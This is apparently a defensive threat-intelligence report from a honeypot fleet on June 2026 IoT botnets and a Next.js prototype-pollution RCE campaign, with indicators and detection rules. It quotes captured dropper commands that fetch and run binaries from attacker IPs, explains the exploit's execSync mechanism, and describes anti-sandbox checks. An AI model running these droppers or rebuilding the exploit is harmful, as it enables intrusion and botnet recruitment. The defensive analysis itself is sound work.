TLP:CLEAR · HIGH · cowrAI Honeypot Fleet · 2026-06-23
June 2026 IoT Surge & Web RCE Campaign
Three concurrent campaigns observed across 36-box global sensor fleet: Flylegit multi-arch IoT worm with honeypot evasion, Frosty Mirai targeting Realtek infrastructure, and active exploitation of Next.js Server Actions RCE.

Executive Summary

Commands logged (7d): 2.7M
Unique source IPs: 8,202
Flylegit architectures: 14
Flylegit VT detections: 0/72
Next.js RCE attempts (14d): 933
Active C2 servers: 3

Between 2026-06-04 and 2026-06-23, cowrAI sensors observed three distinct campaigns operating concurrently. The most significant is the "Flylegit" IoT worm (Telegram: t.me/flylegit), a fully multi-architecture botnet deploying 14-arch binaries from 83.168.110.191 under the guise of a system updater. The malware contains explicit honeypot detection logic that reads /proc/<pid>/comm and exits silently in emulated environments — confirmed by divergent detonation behavior across our sandbox (ARMv7 connected to C2 at port 1336; ARMv5/6 exited cleanly with no contacts). Zero VT detections across all 14 samples as of 2026-06-23.

In parallel, a Next.js Server Actions RCE scanner (103.13.206.12) has been active since 2026-06-09, firing 933 exploit attempts using React Server Components prototype-pollution to gain unauthenticated code execution on vulnerable Node.js web servers. The recovered dropper (repositorylinux.dpdns.org/linux.sh, 24,942 bytes) has no VT coverage.

A third campaign, "Frosty" Mirai (Mirai family by heuristic match, see Campaign 3), explicitly targets Realtek-based embedded devices from 109.104.153.60. Sandbox detonation confirmed a live C2 at 103.106.228.23:80 across 14 consecutive runs spanning 7 days.


Campaign 1 — Flylegit IoT Worm (t.me/flylegit)

Threat Profile
83.168.110.191 · First seen 2026-06-04

Type: Multi-architecture Linux worm / HTTP scanner
Intent: Botnet recruitment, HTTP brute-force scanning
C2: 83.168.110.191:1336 (distribution server doubles as C2)
Attribution: Telegram channel t.me/flylegit (hardcoded string)
VT coverage: 0 detections across all 14 samples
Alias on disk: updaterros.<arch>; the observed loader stages it as /data/local/tmp/com.adal

Honeypot Evasion
Active anti-analysis — confirmed by sandbox divergence

The binary reads /proc/<pid>/comm (format string /proc/%s/comm, pid filled in at runtime) and compares the result against known emulator/sandbox process names. On a match it exits silently with status 0: no C2 contact, no network noise. Under QEMU user-mode emulation that read is answered by the host kernel for the emulator process itself, so the emulator's own name is what comes back.

Hardcoded taunts in string table:

"Looks like you are a honeypot, this tool was made by t.me/flylegit!"

Sandbox evidence: ARMv7l connected to 83.168.110.191:1336, killed at 300s timeout. ARMv5l and ARMv6l exited cleanly — QEMU process name leaked to /proc.

Multi-Architecture Deployment

14 distinct binaries deployed in a single distribution directory, covering embedded Linux, SoC, mobile, and server targets:

ARMv4l ARMv5l ARMv6l ARMv7l AArch64 x86-64 SPARC SH4 PowerPC MIPS MIPSEL m68k i486 ARC

Files are served as iran.<arch> from the distribution directory and renamed to updaterros.<arch> by the loader after download; the fleet has also seen updaterros.<arch> fetched from the server directly (see the dropper sequence below), so both names are live on the host. The naming convention (iran.*) is consistent with prior "flylegit" tooling observed in open-source reporting.

Dropper Sequence (Observed on Fleet)

# Attacker arrives via SSH, runs after login:
curl -s http://83.168.110.191/updaterros.armv7l | sh && echo DONE

# The shell script downloads, stages, and executes:
busybox wget http://83.168.110.191/updaterros.armv7l \
  -O /data/local/tmp/com.adal
chmod 777 /data/local/tmp/com.adal
/data/local/tmp/com.adal
# Connects back to 83.168.110.191:1336

Malware Capabilities (Extracted Strings)

HTTP scanning functionality confirmed — the binary emulates a modern browser session targeting common web admin paths:

# HTTP attack surface
/proc/%s/comm       ← honeypot process check
%s %s HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
/wp-admin
/api/v1
/index.html
/about
/products

Malware Inventory (IOC)

SHA-256             Arch      Size      VT     Detonation
3d20d10c…1bbdd86    ARMv7l    124,640   0/72   C2 hit 83.168.110.191:1336
41dafa96…e235ed6    ARMv5l    131,928   0/72   Exited clean (sandbox detected)
5a4d7866…3d3e14     ARMv6l    146,516   0/72   Exited clean (sandbox detected)
9ccaf7ad…9d495      AArch64   190,448   0/72   (none recorded)
bdde6169…69cf5      x86-64    55,908    0/72   (none recorded)
fc6d6fbc…014f       SPARC     22,140    0/72   (none recorded)
c71e597c…746a       SH4       119,480   0/72   (none recorded)
79925092…cf5        PowerPC   137,916   0/72   (none recorded)
34ec597c…d86        MIPSEL    185,652   0/72   (none recorded)
bc38bc40…429        MIPS      181,556   0/72   (none recorded)
fa190db0…443        m68k      162,456   0/72   (none recorded)
bc1f71da…f25        i486      79,020    0/72   (none recorded)
a09d4c56…0fa        ARMv4l    135,544   0/72   (none recorded)
6bb57ac2…a2         ARC       140,756   0/72   (none recorded)
DETECTION GAP: Zero antivirus coverage as of 2026-06-23. These hashes will not trigger signature-based endpoint or network security controls. Behavioral detection (process reads /proc/self/comm at startup, then connects to single IP:port) is the reliable signal.
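The behavioural signal above (own /proc/<pid>/comm read right after start-up, then either one connect or a silent exit 0) is easy to operationalise against a syscall trace. The block below is an added example, not cowrAI tooling: a small Node.js classifier over strace-style lines. The two traces are constructed to mirror the ARMv7 (beacon) and ARMv5 (bail-out) detonations reported above, and the "qemu-" prefix test is an assumption about what the sample treats as a sandbox name.

```javascript
'use strict';
// Added example (cowrAI does not publish this code): classify a sandbox
// syscall trace for the Flylegit behaviour described above. Verdicts:
//   c2-beacon         own /proc/<pid>/comm read shortly after execve, then exactly one connect
//   sandbox-detected  same comm read, comm value looks like an emulator, exit 0, no network
// TRACE_ARMV7 and TRACE_ARMV5 are CONSTRUCTED strace -f -tt style lines that
// mirror the two detonation outcomes reported; the "qemu-" prefix test is an
// assumption about what the sample treats as a sandbox name.

const TRACE_ARMV7 = `
10:00:01.000 4012 execve("/data/local/tmp/com.adal", ["/data/local/tmp/com.adal"], 0x7ffc) = 0
10:00:01.004 4012 getpid() = 4012
10:00:01.005 4012 openat(AT_FDCWD, "/proc/4012/comm", O_RDONLY) = 3
10:00:01.006 4012 read(3, "com.adal\\n", 64) = 9
10:00:01.120 4012 socket(AF_INET, SOCK_STREAM, IPPROTO_IP) = 4
10:00:01.121 4012 connect(4, {sa_family=AF_INET, sin_port=htons(1336), sin_addr=inet_addr("83.168.110.191")}, 16) = 0
10:05:01.000 4012 +++ killed by SIGKILL +++
`;

const TRACE_ARMV5 = `
10:10:01.000 5120 execve("/tmp/updaterros.armv5l", ["/tmp/updaterros.armv5l"], 0x7ffd) = 0
10:10:01.003 5120 openat(AT_FDCWD, "/proc/5120/comm", O_RDONLY) = 3
10:10:01.004 5120 read(3, "qemu-arm-static\\n", 64) = 16
10:10:01.005 5120 close(3) = 0
10:10:01.006 5120 exit_group(0) = ?
`;

const LINE = /^(\d{2}):(\d{2}):(\d{2})\.(\d+)\s+(\d+)\s+([a-z_0-9]+)\((.*)\)\s*=\s*(\S+)/;

function parseTrace(text) {
  const events = [];
  for (const raw of text.split('\n')) {
    const m = LINE.exec(raw.trim());
    if (!m) continue;                                   // skips strace noise such as "+++ killed by SIGKILL +++"
    const t = +m[1] * 3600 + +m[2] * 60 + +m[3] + +m[4] / 10 ** m[4].length;
    events.push({ t, pid: +m[5], call: m[6], args: m[7], ret: m[8] });
  }
  return events;
}

const EMULATOR_COMM = /^qemu-/;     // assumption: names the sample treats as "honeypot"

function classify(events, windowSec = 5) {
  const procs = new Map();
  for (const ev of events) {
    if (!procs.has(ev.pid)) {
      procs.set(ev.pid, { pid: ev.pid, start: null, commFd: null, commReadAt: null, comm: null, connects: new Set(), exitCode: null });
    }
    const p = procs.get(ev.pid);
    if (ev.call === 'execve' && ev.ret === '0') p.start = ev.t;
    if ((ev.call === 'openat' || ev.call === 'open') &&
        (ev.args.includes(`"/proc/${ev.pid}/comm"`) || ev.args.includes('"/proc/self/comm"'))) {
      p.commFd = ev.ret;                                // remember the fd so the next read on it gives the comm value
      p.commReadAt = ev.t;
    }
    if (ev.call === 'read' && p.commFd !== null && ev.args.startsWith(p.commFd + ',')) {
      const q = /"([^"]*)"/.exec(ev.args);
      if (q) p.comm = q[1].replace(/\\n$/, '');         // strip strace's escaped trailing newline
      p.commFd = null;
    }
    if (ev.call === 'connect' && ev.ret === '0') {
      const port = /htons\((\d+)\)/.exec(ev.args);
      const ip = /inet_addr\("([\d.]+)"\)/.exec(ev.args);
      if (port && ip) p.connects.add(`${ip[1]}:${port[1]}`);
    }
    if (ev.call === 'exit_group') p.exitCode = Number(ev.args);
  }

  const verdicts = [];
  for (const p of procs.values()) {
    const earlyCommCheck = p.start !== null && p.commReadAt !== null && p.commReadAt - p.start <= windowSec;
    let verdict = 'no-match';
    if (earlyCommCheck && p.connects.size === 1) {
      verdict = 'c2-beacon';
    } else if (earlyCommCheck && p.connects.size === 0 && p.exitCode === 0 && p.comm !== null && EMULATOR_COMM.test(p.comm)) {
      verdict = 'sandbox-detected';
    }
    verdicts.push({ pid: p.pid, comm: p.comm, c2: [...p.connects][0] || null, exitCode: p.exitCode, verdict });
  }
  return verdicts;
}

console.log(classify(parseTrace(TRACE_ARMV7)));   // verdict 'c2-beacon', c2 '83.168.110.191:1336'
console.log(classify(parseTrace(TRACE_ARMV5)));   // verdict 'sandbox-detected', comm 'qemu-arm-static'
```

The "sandbox-detected" verdict is the one worth alerting on internally: it tells the analyst the detonation was short-circuited rather than that the sample is benign, which is exactly the ARMv5/v6 case above.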

Campaign 2 — Next.js Server Actions RCE (repositorylinux.dpdns.org)

Threat Profile
103.13.206.12 · Active since 2026-06-09

Type: Web application exploitation scanner
Target: Next.js applications with Server Actions enabled
Dropper: repositorylinux.dpdns.org/linux.sh (24,942 bytes)
Attack volume: 933 attempts (14 days, single IP)
VT coverage: none for linux.sh (0/0, not submitted)
Exfil method: Output leaked via NEXT_REDIRECT digest URL parameter

Exploit Mechanism
React Server Components prototype pollution → RCE

The attack targets the React Flight protocol's JSON deserializer, the component that turns a Server Action's multipart/form-data body back into objects. A crafted body posted to any Next.js Server Action endpoint carries a key named __proto__ whose value supplies a then member, so the deserialized object picks up an attacker-controlled then through its prototype chain (the __proto__:then pollution).

The _response._prefix field is injected with arbitrary JavaScript that executes in the Node.js context via process.mainModule.require('child_process').execSync(). Command output is exfiltrated through the redirect URL that rides in the NEXT_REDIRECT digest rather than through a response body, so it is invisible to body logging and to a WAF that only inspects response bodies; defenders should log the redirect targets Server Action responses emit, not only the bodies.
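The mechanism is easier to see on a toy deserializer than on React's real one. The block below is an added example, not React or Next.js code: a naive "hydrator" that rebuilds objects from a JSON payload with plain key assignment, which is the shape of deserializer the __proto__:then trick abuses, next to a hardened version. Two things are assumptions of the model: a string "$call:<name>" is resolved to a function from a small registry (standing in for the reference resolution a real wire format performs; the Flight encoding itself is not reproduced), and the sink only records that it ran instead of spawning child_process.

```javascript
'use strict';
// Added example, not React or Next.js code: a toy hydrator that rebuilds
// objects from a JSON wire payload with plain key assignment, the shape of
// deserializer the report's "__proto__:then" pollution abuses, next to a
// hardened version. ASSUMPTIONS of the model: a string "$call:<name>" resolves
// to a function from REGISTRY (a stand-in for a wire format's reference
// resolution; the real React Flight encoding is not reproduced), and the sink
// only records that it ran instead of spawning child_process.

const REGISTRY = {
  sink: function attackerThen(resolve) {       // stands in for execSync(...) in the real payload
    attackerThen.calls += 1;
    resolve('attacker code ran');
  },
};
REGISTRY.sink.calls = 0;

function resolveRef(v) {
  return typeof v === 'string' && v.startsWith('$call:') ? REGISTRY[v.slice(6)] : v;
}

// VULNERABLE: JSON.parse creates an OWN property literally named "__proto__";
// copying it with out[k] = ... hits Object.prototype's __proto__ setter, so the
// attacker's object becomes the prototype of the hydrated value and every key
// inside it (here: then) is reachable through the chain.
function hydrateNaive(node) {
  if (Array.isArray(node)) return node.map(hydrateNaive);
  if (node !== null && typeof node === 'object') {
    const out = {};
    for (const k of Object.keys(node)) out[k] = hydrateNaive(node[k]);
    return out;
  }
  return resolveRef(node);
}

// HARDENED: null-prototype containers have no __proto__ setter to hit, and the
// three keys that can reach a prototype are rejected outright.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function hydrateSafe(node) {
  if (Array.isArray(node)) return node.map(hydrateSafe);
  if (node !== null && typeof node === 'object') {
    const out = Object.create(null);
    for (const k of Object.keys(node)) {
      if (FORBIDDEN.has(k)) throw new Error(`rejected key ${JSON.stringify(k)}`);
      out[k] = hydrateSafe(node[k]);
    }
    return out;
  }
  return resolveRef(node);
}

// What a framework does when it awaits / Promise-resolves the hydrated value:
// if value.then is a function it gets called with the resolver.
function isThenable(v) {
  return v !== null && typeof v === 'object' && typeof v.then === 'function';
}

// CONSTRUCTED payload in the shape of the attack: an innocuous-looking
// object whose "__proto__" member carries a "then".
const PAYLOAD = '{"id":1,"__proto__":{"then":"$call:sink"}}';

function demo() {
  REGISTRY.sink.calls = 0;
  const parsed = JSON.parse(PAYLOAD);
  const naive = hydrateNaive(parsed);
  let captured = null;
  if (isThenable(naive)) naive.then((v) => { captured = v; });   // the await path, driven by hand
  let safeError = null;
  try { hydrateSafe(parsed); } catch (e) { safeError = e.message; }
  return {
    ownProtoKey: Object.prototype.hasOwnProperty.call(parsed, '__proto__'),   // true: JSON.parse keeps it as data
    naiveId: naive.id,
    naiveThenable: isThenable(naive),                                           // true: then inherited from attacker object
    naiveOwnThen: Object.prototype.hasOwnProperty.call(naive, 'then'),          // false: it lives on the chain
    globalPolluted: typeof Object.prototype.then === 'function',                // false: instance chain, not Object.prototype
    sinkCalls: REGISTRY.sink.calls,
    captured,
    safeError,
  };
}

console.log(demo());
```

In a real consumer the call happens implicitly: await hydrated or Promise.resolve(hydrated) looks up hydrated.then and invokes it on the microtask queue, which is why the demo drives it by hand. Note that Object.prototype itself stays clean; what is polluted is the instance's chain, so a check that only looks for global pollution would miss this.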

Full Exploit Payload (Recovered from Fleet)

Key Observations

NOTE: The cowrAI SSH honeypot captured this payload when attackers attempted the exploit against the cowrie SSH shell (the JSON was submitted as a raw shell command). This is a scanning tool that fires blindly against any open port — it does not distinguish between an SSH shell and an HTTP server. Web-facing Next.js servers are the actual target.

Dropper IOC

SHA-256            Type          Size     URL                                   VT
cfab101e…9cd5f5    Shell script  24,942   repositorylinux.dpdns.org/linux.sh    0/0 (not submitted)

Campaign 3 — Frosty Mirai (Realtek-targeted)

Threat Profile
109.104.153.60 · First seen 2026-06-17

Type: Mirai botnet variant
Target: Realtek-chipset embedded devices
C2: 103.106.228.23:80 (confirmed active, 14 sandbox connections)
Self-rep vector: SSH brute-force + Realtek exploit (realtek.selfrep arg)
Binary alias on disk: zuki
Family: Mirai (heuristic match, consistent across all 14 detonations)

Sandbox Telemetry
14 consecutive detonations, 2026-06-17 → 2026-06-23

Frosty.mips (33efcefc…) booted successfully in every detonation. The binary consistently contacts 103.106.228.23:80 and then enters a silent wait loop (c2_silent_bail) — the C2 is up but not issuing commands during our observation windows. This is typical Mirai behavior: bots idle until the operator pushes a DDoS job.

C2: 103.106.228.23:80
Status: ALIVE (14/14 connections confirmed)
Bot behavior: connect → idle → await command

Dropper Sequence

# Observed loader command from 203.193.150.244 relay:
cd /var
rm -rf zuki
wget http://109.104.153.60/bins/frosty.mips -O zuki
chmod 777 zuki
./zuki realtek.selfrep    ← self-replication mode targeting Realtek devices
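Both this sequence and the Flylegit one earlier are the same shape: optional cd, fetch with wget or curl, chmod, exec (or a straight pipe into sh). The block below is an added example, not cowrAI ingest code: a Node.js reducer that turns cowrie.command.input events into dropper IOCs (fetch host and path, staging path, chmod mode, exec arguments such as realtek.selfrep, and pipe-to-shell). The EVENTS array is constructed from the two dropper sequences quoted in this report; the 198.51.100.x source addresses are documentation-range placeholders, and the field names follow cowrie's JSON log.

```javascript
'use strict';
// Added example, not cowrAI ingest code: reduce cowrie.command.input events to
// dropper IOCs (fetch URL, staging path, chmod mode, exec arguments, pipe-to-
// shell). EVENTS is CONSTRUCTED from the two dropper sequences quoted in this
// report; 198.51.100.x sources are documentation-range placeholders and the
// field names follow cowrie's JSON log (eventid, src_ip, input).

const EVENTS = [
  { eventid: 'cowrie.command.input', src_ip: '203.193.150.244',
    input: 'cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep' },
  { eventid: 'cowrie.command.input', src_ip: '198.51.100.7',
    input: 'curl -s http://83.168.110.191/updaterros.armv7l | sh && echo DONE' },
  { eventid: 'cowrie.command.input', src_ip: '198.51.100.7',
    input: 'busybox wget http://83.168.110.191/updaterros.armv7l -O /data/local/tmp/com.adal; chmod 777 /data/local/tmp/com.adal; /data/local/tmp/com.adal' },
  { eventid: 'cowrie.login.success', src_ip: '198.51.100.9' },
  { eventid: 'cowrie.command.input', src_ip: '198.51.100.9', input: 'uname -a; cat /proc/cpuinfo' },
];

const URL_RE = /https?:\/\/[^\s'"|;&]+/;
const PIPE_TO_SHELL = /\|\s*(?:busybox\s+)?(?:ba|da|a)?sh\b/;

const basename = (p) => p.split('/').pop();
const joinPath = (cwd, name) => (name.startsWith('/') ? name : `${cwd ? cwd.replace(/\/+$/, '') : '.'}/${name}`);

// Walk one command line left to right, splitting on ; && || but keeping a pipe
// inside its segment so "curl ... | sh" is seen as one fetch-and-run step.
// Only wget -O and curl -o are understood for the output name (curl -O is not).
function parseCommandLine(src_ip, line) {
  const found = [];
  let cwd = null;
  let cur = null;                                  // most recent fetch in this line
  for (const seg of line.split(/\s*(?:;|&&|\|\|)\s*/).filter(Boolean)) {
    const cd = /^cd\s+(\S+)/.exec(seg);
    if (cd) { cwd = cd[1]; continue; }
    const url = URL_RE.exec(seg);
    if (url && /\b(?:wget|curl)\b/.test(seg)) {
      const u = new URL(url[0]);
      const outOpt = (/\bwget\b/.test(seg) ? /\s-O\s+(\S+)/ : /\s-o\s+(\S+)/).exec(seg);
      const piped = PIPE_TO_SHELL.test(seg);
      cur = {
        src_ip, url: url[0], host: u.hostname, path: u.pathname,
        saveAs: piped ? null : joinPath(cwd, outOpt ? outOpt[1] : basename(u.pathname)),
        pipedToShell: piped, chmod: null, executed: false, execArgs: [],
      };
      found.push(cur);
      continue;
    }
    if (!cur || !cur.saveAs) continue;
    const chmod = /^chmod\s+(\S+)\s+(\S+)/.exec(seg);
    if (chmod) {
      if (basename(chmod[2]) === basename(cur.saveAs)) cur.chmod = chmod[1];
      continue;
    }
    const words = seg.split(/\s+/);
    const target = words[0].replace(/^\.\//, '');
    if (target === cur.saveAs || target === basename(cur.saveAs)) {
      cur.executed = true;
      cur.execArgs = words.slice(1);               // e.g. realtek.selfrep, the propagation mode selector
    }
  }
  return found;
}

function extractDroppers(events) {
  const out = [];
  for (const ev of events) {
    if (ev.eventid !== 'cowrie.command.input' || typeof ev.input !== 'string') continue;
    out.push(...parseCommandLine(ev.src_ip, ev.input));
  }
  return out;
}

// One entry per distribution host with the paths seen, the shape a blocklist or
// a Suricata http.uri rule wants.
function toHostIocs(records) {
  const byHost = new Map();
  for (const r of records) {
    if (!byHost.has(r.host)) byHost.set(r.host, new Set());
    byHost.get(r.host).add(r.path);
  }
  return [...byHost].map(([host, paths]) => ({ host, paths: [...paths].sort() }));
}

console.log(JSON.stringify(extractDroppers(EVENTS), null, 2));
console.log(toHostIocs(extractDroppers(EVENTS)));
```

The execArgs field is the one to keep an eye on for Mirai-derived loaders: the argument after the binary (realtek.selfrep here) usually names the propagation mode and is a stable string across rebuilds even when hashes change.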

IOC Table

SHA-256          Arch   Size      C2                   VT family
33efcefc…2fa3    MIPS   120,488   103.106.228.23:80    Mirai

Annex — Rebirth Mirai (Huawei/ADB-targeted)

A fourth campaign was observed at lower volume from 176.65.139.48, deploying rebirth.arm7 (SHA-256: 849840d9…39b5, 199,179 bytes, family: Mirai). The binary carries an explicit Huawei home-gateway exploit payload (POST /ctrlt/DeviceUpgrade_1 with digest auth, the HG532 router vector), the "TSource Engine Query" bytes Mirai uses for its Valve Source Engine UDP flood, and an Android ADB spread path that masquerades as com.supercell.clashroyal. Sandbox detonation confirmed C2 at 178.16.52.104 on ports 18234, 19823 and 62849.

SHA-256          C2                                        Exploit / attack vectors
849840d9…39b5    178.16.52.104:18234 / :19823 / :62849     Huawei /ctrlt/DeviceUpgrade_1 exploit, Valve Source Engine query flood, ADB

Infrastructure Map

Relay / Recon node
  203.193.150.244  ──── fires 29-cmd sysrecon sequence ────────────────── victim SSH
      │
      ├── wget http://109.104.153.60/bins/frosty.mips → zuki         [Mirai]
      │         └── C2 → 103.106.228.23:80
      │
      ├── curl http://83.168.110.191/updaterros.<arch> | sh         [Flylegit]
      │         └── C2 → 83.168.110.191:1336 (same server)
      │
      ├── wget http://156.226.174.98/bins/sora.<arch> → robben      [Sora, unconfirmed]
      │         └── C2 → unknown (exec exits cleanly, 0 contacts)
      │
      └── wget http://176.65.139.48/rebirth.arm7                     [Rebirth Mirai]
                └── C2 → 178.16.52.104 :18234/:19823/:62849

Web RCE scanner (separate campaign)
  103.13.206.12   ──── RSC prototype pollution form-post ─────────────── Next.js server
                          └── dropper: repositorylinux.dpdns.org/linux.sh

MITRE ATT&CK Mapping

ID          Technique                                          Campaign                     Evidence
T1110.001   Brute Force: Password Guessing                     All                          cowrie.login.success 709k / 7d
T1059.004   Command and Scripting Interpreter: Unix Shell      All                          Command sequences observed in cowrie.command.input
T1082       System Information Discovery                       Flylegit, Sora relay         uname, /proc/cpuinfo, ip route, ss -tuln, which yum/apt/pacman/zypper
T1083       File and Directory Discovery                       Relay recon                  ls -la /, mount, env, history, ps aux sequences
T1105       Ingress Tool Transfer                              All                          wget/curl dropper fetches to /tmp, /var, /data/local/tmp
T1496       Resource Hijacking                                 Frosty, Rebirth, Flylegit    Mirai bot recruitment for DDoS botnet
T1498       Network Denial of Service                          Rebirth                      "TSource Engine Query" bytes (Mirai's Valve Source Engine UDP flood vector)
T1190       Exploit Public-Facing Application                  Next.js RCE, Rebirth         RSC __proto__:then pollution via Server Actions; Huawei POST /ctrlt/DeviceUpgrade_1 payload
T1059.007   Command and Scripting Interpreter: JavaScript      Next.js RCE                  process.mainModule.require execSync injection
T1497.001   Virtualization/Sandbox Evasion: System Checks      Flylegit                     /proc/self/comm read at startup; silent exit on emulator detection
T1036.004   Masquerading: Masquerade Task or Service           Flylegit, Rebirth            Binary named updaterros; Rebirth disguised as com.supercell.clashroyal
T1071.001   Application Layer Protocol: Web Protocols          Frosty C2                    Check-in to 103.106.228.23:80 (port-based mapping; Mirai check-in is a binary protocol, confirm with a payload capture before relying on HTTP-layer detection)
T1095       Non-Application Layer Protocol                     Flylegit C2, Rebirth C2      Raw TCP beacons to 83.168.110.191:1336 and 178.16.52.104:18234/:19823/:62849

Master IOC List

IP Addresses

IP                 Role                                         First seen    Confidence
83.168.110.191     Flylegit distribution + C2 (:1336)           2026-06-04    High
109.104.153.60     Frosty distribution (/bins/frosty.*)         2026-06-17    High
103.106.228.23     Frosty C2 (:80)                              2026-06-17    High (14 sandbox hits)
156.226.174.98     Sora distribution (/bins/sora.*)             2026-06-22    High
176.65.139.48      Rebirth distribution (/rebirth.arm7)         2026-06-15    High
178.16.52.104      Rebirth C2 (:18234, :19823, :62849)          2026-06-15    High (sandbox confirmed)
203.193.150.244    Recon relay / multi-campaign loader          2026-06-09    High
103.13.206.12      Next.js RCE scanner                          2026-06-09    High (933 attempts)

Domains

Domain                       Role                                     Protocol
repositorylinux.dpdns.org    Next.js RCE dropper server (linux.sh)    HTTPS (self-signed)

File Hashes (SHA-256)

SHA-256             Family               Arch           On-disk name
3d20d10c…1bbdd86    Flylegit             ARMv7l         updaterros.armv7l / iran.armv7l
41dafa96…e235ed6    Flylegit             ARMv5l         updaterros.armv5l
5a4d7866…3d3e14     Flylegit             ARMv6l         updaterros.armv6l
9ccaf7ad…9d495      Flylegit             AArch64        iran.aarch64
bdde6169…69cf5      Flylegit             x86-64         iran.x86_64
fc6d6fbc…014f       Flylegit             SPARC          iran.sparc
c71e597c…746a       Flylegit             SH4            iran.sh4
79925092…cf5        Flylegit             PowerPC        iran.powerpc
34ec597c…d86        Flylegit             MIPSEL         iran.mipsel
bc38bc40…429        Flylegit             MIPS           iran.mips
fa190db0…443        Flylegit             m68k           iran.m68k
bc1f71da…f25        Flylegit             i486           iran.i486
a09d4c56…0fa        Flylegit             ARMv4l         iran.armv4l
6bb57ac2…a2         Flylegit             ARC            iran.arc
33efcefc…2fa3       Frosty/Mirai         MIPS           zuki
849840d9…39b5       Rebirth/Mirai        ARMv7          com.supercell.clashroyal
cfab101e…9cd5f5     linux.sh dropper     Shell script   linux.sh
06f8f80d…c7eada     Sora (unconfirmed)   x86            robben
bed2dc64…b57a       Sora (unconfirmed)   MIPS           robben
ae353956…af0e8      Sora (unconfirmed)   x86-64         robben
2f25ceeb…1efd       Sora (unconfirmed)   i686           robben
2abc33cb…049d2      Sora (unconfirmed)   ARMv7          robben

Detection Signatures

Suricata — Flylegit Distribution Server

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"cowrAI - Flylegit IoT worm download iran.*"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/iran."; classtype:trojan-activity; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100001; rev:1;)
alert tcp $HOME_NET any -> 83.168.110.191 1336 (msg:"cowrAI - Flylegit C2 beacon port 1336"; flow:established,to_server; classtype:command-and-control; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100002; rev:1;)

Caveats: sid 9100001 matches only the iran.<arch> path, while the loader sequence captured on the fleet fetched updaterros.<arch> from the same host directly, so that URI needs covering as well. sid 9100002 is a bare IP:port rule with no payload match and will fire on any TCP session to that socket, including the sandbox's own detonations if their egress crosses the sensor.

Suricata — Frosty/Mirai C2

alert tcp $HOME_NET any -> 103.106.228.23 80 (msg:"cowrAI - Frosty Mirai C2 check-in"; flow:established,to_server; classtype:command-and-control; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100003; rev:1;)

Suricata — Next.js RSC Prototype Pollution RCE

alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"cowrAI - Next.js RSC __proto__:then RCE attempt"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"__proto__:then"; content:"execSync"; content:"repositorylinux"; classtype:web-application-attack; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100004; rev:1;)
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"cowrAI - Next.js RSC execSync child_process injection"; flow:established,to_server; http.request_body; content:"process.mainModule"; content:"child_process"; content:"execSync"; content:"NEXT_REDIRECT"; classtype:web-application-attack; reference:url,cowrai-intel-reports.pages.dev/june-2026-iot-surge; sid:9100005; rev:1;)

Caveats: sid 9100004 requires the string repositorylinux in the body and is therefore tied to this dropper host; sid 9100005 is the host-agnostic companion and is the one to keep when the payload is re-hosted. Both inspect http.request_body, so the app-layer request-body-limit must be large enough to cover a multipart Server Action post, or the inspected region is truncated before the payload.

Yara — Flylegit Honeypot Detection String

rule Flylegit_IoT_Worm_Honeypot_Check {
    meta:
        author = "cowrAI"
        date = "2026-06-23"
        description = "Flylegit multi-arch worm with honeypot detection"
        reference = "https://cowrai-intel-reports.pages.dev/june-2026-iot-surge"
    strings:
        $hp_str = "Looks like you are a honeypot, this tool was made by t.me/flylegit!" ascii
        $tg = "t.me/flylegit" ascii
        $proc = "/proc/%s/comm" ascii
    condition:
        uint32(0) == 0x464C457F and   // ELF magic, 0x7F 'E' 'L' 'F' read little-endian
        ( $hp_str or ($tg and $proc) )   // $proc alone is a generic format string (common in procps-style code); require a campaign marker beside it
}

Collection Methodology

All data collected from the cowrAI distributed honeypot fleet: 36 Linux VPS nodes across Cloudzy (Bern/Frankfurt), Vultr, DigitalOcean, Netcup, TeamBlue, and Hetzner. Each node runs cowrie 2.9.17 with the LLM backend (Gemma3:12b) for authentic shell interaction, plus a randomized subset of 9 alt-protocol lure daemons (adbhoney, soaplure, httplure, redislure, llmlure, apachelure, sqllure, vnclure, mlinfralure).

Events ingest in near-real-time to Cloudflare D1 (operational) and PostgreSQL (via Hyperdrive) with Analytics Engine for fleet aggregates. Binaries are captured by the ingest sidecar and stored in R2; classification runs automatically (strings extraction → family heuristics → VirusTotal → tria.ge → Workers AI summary → YARA). Sandbox detonation runs on sandbox-sfo (Ubuntu, QEMU user-mode emulation, WARP egress, 50 Mbit/s qdisc + outbound denylist) with 300-second default runtime and 12-hour dwell option.

Sandbox limitation noted: Flylegit's /proc/self/comm anti-sandbox check detects QEMU user-mode emulation via the process name. ARMv5/6 samples exited without C2 contact; ARMv7 (direct exec path) connected to C2. This is a known gap; QEMU process name masking is not currently implemented. Since comm is derived from the basename of the path passed to execve (truncated to 15 characters) and qemu-user passes that read straight through to the host kernel, a cheap interim fix is to exec the emulator through a symlink or copy named after the sample; a prctl(PR_SET_NAME) issued by a wrapper before exec does not survive, because execve resets comm.

Timeline

2026-06-04
Flylegit first observed on fleet — iran.armv7l downloaded from 83.168.110.191
2026-06-09
Next.js RCE scanner (103.13.206.12) begins active campaign; linux.sh dropper captured
2026-06-11
Full Flylegit 14-arch suite captured; sandbox detonation confirms C2 83.168.110.191:1336 on ARMv7
2026-06-15
Rebirth Mirai (176.65.139.48) captured; sandbox confirms C2 178.16.52.104 on three ports
2026-06-17
Frosty Mirai (109.104.153.60) captured; continuous C2 contact confirmed to 103.106.228.23:80
2026-06-22
Sora botnet (156.226.174.98) debuts — 11-arch UPX-packed binaries, 0 VT detections, renamed to "robben"
2026-06-23
Report published. VT submissions filed for all Sora samples. All C2s remain active.